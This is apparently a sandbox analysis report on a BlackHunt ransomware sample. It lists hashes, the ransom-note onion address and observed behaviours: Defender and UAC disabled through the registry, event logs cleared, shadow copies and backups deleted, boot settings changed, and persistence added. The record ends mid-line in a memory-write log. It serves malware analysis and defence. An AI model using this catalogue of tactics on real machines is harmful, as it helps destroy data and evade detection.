Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:36
Static task
static1
Behavioral task
behavioral1
Sample
b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe
Resource
win10v2004-20231222-en
General
-
Target
b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe
-
Size
707KB
-
MD5
cbddcd0dacb4ab3f8723c044ef220793
-
SHA1
bce925938248d416c88217f8726d197f5fd64db7
-
SHA256
b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c
-
SHA512
0e0774e562204a1e05fead571ed791508bf1d90141111505941ca66899be5ed1dae31703312ba779eac9d314636c9e77e17efd758d39bf6ccc73d59ef8cdbf18
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1C88vnh:6uaTmkZJ+naie5OTamgEoKxLWBih
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4828 fsutil.exe 1664 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 4548 wevtutil.exe 4620 wevtutil.exe 4744 wevtutil.exe 4732 wevtutil.exe 4724 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1308 bcdedit.exe 2820 bcdedit.exe 4884 bcdedit.exe 4800 bcdedit.exe -
Renames multiple (2875) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1192 wbadmin.exe 4804 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3916 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\J: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\K: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\O: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\V: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\I: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\S: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\M: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\E: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\Y: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\P: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\U: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\W: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\R: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\H: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\L: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\Z: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\T: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\G: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\X: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\N: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened (read-only) \??\B: b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\plugins\meta_engine\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Google\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Dot.png b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_ButtonGraphic.png b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jre7\lib\zi\America\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_SelectionSubpicture.png b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\performance.png b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup.xml b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Catamarca b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sitka b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Cape_Verde b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jre7\lib\management\#BlackHunt_ReadMe.txt b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chicago b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zaporozhye b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Ojinaga b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-image-mask.png b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\HST10 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#BlackHunt_Private.key b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#BlackHunt_ReadMe.hta b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1472 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2620 vssadmin.exe 756 vssadmin.exe 352 vssadmin.exe 2652 vssadmin.exe 1740 vssadmin.exe 4916 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 5024 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2232 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 4076 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeRestorePrivilege 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeBackupPrivilege 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeTakeOwnershipPrivilege 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeAuditPrivilege 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeSecurityPrivilege 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeIncBasePriorityPrivilege 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Token: SeBackupPrivilege 1428 vssvc.exe Token: SeRestorePrivilege 1428 vssvc.exe Token: SeAuditPrivilege 1428 vssvc.exe Token: SeBackupPrivilege 2708 wbengine.exe Token: SeRestorePrivilege 2708 wbengine.exe Token: SeSecurityPrivilege 2708 wbengine.exe Token: SeSecurityPrivilege 4732 wevtutil.exe Token: SeSecurityPrivilege 4620 wevtutil.exe Token: SeBackupPrivilege 4732 wevtutil.exe Token: SeSecurityPrivilege 4744 wevtutil.exe Token: SeBackupPrivilege 4620 wevtutil.exe Token: SeSecurityPrivilege 4724 wevtutil.exe Token: SeBackupPrivilege 4744 wevtutil.exe Token: SeBackupPrivilege 4724 wevtutil.exe Token: SeSecurityPrivilege 4548 wevtutil.exe Token: SeBackupPrivilege 4548 wevtutil.exe Token: SeDebugPrivilege 5024 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1652 wrote to memory of 2924 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 29 PID 1652 wrote to memory of 2924 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 29 PID 1652 wrote to memory of 2924 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 29 PID 1652 wrote to memory of 2924 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 29 PID 1652 wrote to memory of 2928 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 31 PID 1652 wrote to memory of 2928 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 31 PID 1652 wrote to memory of 2928 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 31 PID 1652 wrote to memory of 2928 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 31 PID 2924 wrote to memory of 2444 2924 cmd.exe 33 PID 2924 wrote to memory of 2444 2924 cmd.exe 33 PID 2924 wrote to memory of 2444 2924 cmd.exe 33 PID 1652 wrote to memory of 2484 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 34 PID 1652 wrote to memory of 2484 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 34 PID 1652 wrote to memory of 2484 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 34 PID 1652 wrote to memory of 2484 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 34 PID 1652 wrote to memory of 2700 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 36 PID 1652 wrote to memory of 2700 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 36 PID 1652 wrote to memory of 2700 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 36 PID 1652 wrote to memory of 2700 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 36 PID 2928 wrote to memory of 2784 2928 cmd.exe 37 PID 2928 wrote to memory of 2784 2928 cmd.exe 37 PID 2928 wrote to memory of 2784 2928 cmd.exe 37 PID 1652 wrote to memory of 2872 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 39 PID 1652 wrote to memory of 2872 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 39 PID 1652 wrote to memory of 2872 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 39 PID 1652 wrote to memory of 2872 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 39 PID 1652 wrote to memory of 2752 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 41 PID 1652 wrote to memory of 2752 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 41 PID 1652 wrote to memory of 2752 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 41 PID 1652 wrote to memory of 2752 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 41 PID 1652 wrote to memory of 2720 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 42 PID 1652 wrote to memory of 2720 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 42 PID 1652 wrote to memory of 2720 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 42 PID 1652 wrote to memory of 2720 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 42 PID 2484 wrote to memory of 2728 2484 cmd.exe 43 PID 2484 wrote to memory of 2728 2484 cmd.exe 43 PID 2484 wrote to memory of 2728 2484 cmd.exe 43 PID 2700 wrote to memory of 2896 2700 cmd.exe 45 PID 2700 wrote to memory of 2896 2700 cmd.exe 45 PID 2700 wrote to memory of 2896 2700 cmd.exe 45 PID 1652 wrote to memory of 2756 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 47 PID 1652 wrote to memory of 2756 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 47 PID 1652 wrote to memory of 2756 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 47 PID 1652 wrote to memory of 2756 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 47 PID 1652 wrote to memory of 2632 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 141 PID 1652 wrote to memory of 2632 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 141 PID 1652 wrote to memory of 2632 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 141 PID 1652 wrote to memory of 2632 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 141 PID 1652 wrote to memory of 3012 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 53 PID 1652 wrote to memory of 3012 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 53 PID 1652 wrote to memory of 3012 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 53 PID 1652 wrote to memory of 3012 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 53 PID 1652 wrote to memory of 2356 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 51 PID 1652 wrote to memory of 2356 1652 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 51 PID 1652 wrote to memory of 2356 1652 